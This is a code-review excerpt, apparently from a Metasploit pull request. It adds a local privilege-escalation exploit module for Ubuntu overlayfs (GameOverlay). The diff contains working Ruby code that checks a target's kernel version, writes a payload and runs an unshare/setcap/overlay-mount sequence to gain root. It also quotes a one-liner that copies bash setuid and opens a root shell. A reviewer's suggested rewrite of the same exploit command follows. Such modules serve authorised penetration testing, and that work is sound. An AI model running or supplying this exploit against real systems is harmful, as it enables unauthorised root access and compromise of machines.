modules/exploits/linux/local/gameoverlay_privesc.rb

```diff
@@ -0,0 +1,143 @@
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+
+    return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
+  end
+
+  def exploit
+    pay_file = datastore['PayloadFilename']
+
+    pay_dir = datastore['WritableDir']
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += Rex::Text.rand_text_alpha 10
+
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    print_status "Creating directory to store payload: #{pay_dir}"
+    mkdir pay_dir
+
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+
+    directories.each do |dir|
+      print_status "Creating directory #{dir}"
+      mkdir "#{dir}"
+    end
+
+    pay = "#{pay_dir}#{pay_file}"
+
+    print_status "Writing payload: #{pay}"
+
+    write_file pay, generate_payload.generate
+
+    print_status 'Starting new namespace, and running exploit...'
+
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+    
+    # Exploit overlayfs vuln
+    hack =  "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; 
+    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\""
+    
+
+    print_status "Running exploit:\n'#{hack}'\n"
+    print_status(cmd_exec_with_result(hack).to_s)
+
+    # Trigger payload
+    trigger = "chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}"
+
+    print_status "Triggering payload: #{trigger}"
+    print_status(cmd_exec_with_result(trigger).to_s)
```

Comment:
```suggestion
    # Build the command

    exploit_cmd = 'unshare -rm sh -c "'
    exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
    exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
    exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
    exploit_cmd << "touch #{merge_dir}*; \" && "
    exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
    exploit_cmd << "#{bash_copy} -p -c "
    exploit_cmd << payload_cmd
    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"

    vprint_status(exploit_cmd.to_s)

    output = cmd_exec(exploit_cmd)
    print_status(output)
```

I could not wrap my head around the command as a single line, so to help debug I split it into manageable sections to help me see what was happening.  The main change I did was to pass the binary payload into the copied bash binary with the `-c` command.  I think there's a mismatch on permissions and the environment, so you've got to have the `-p`.  Simply trying to execute the binary payload directly fails without it.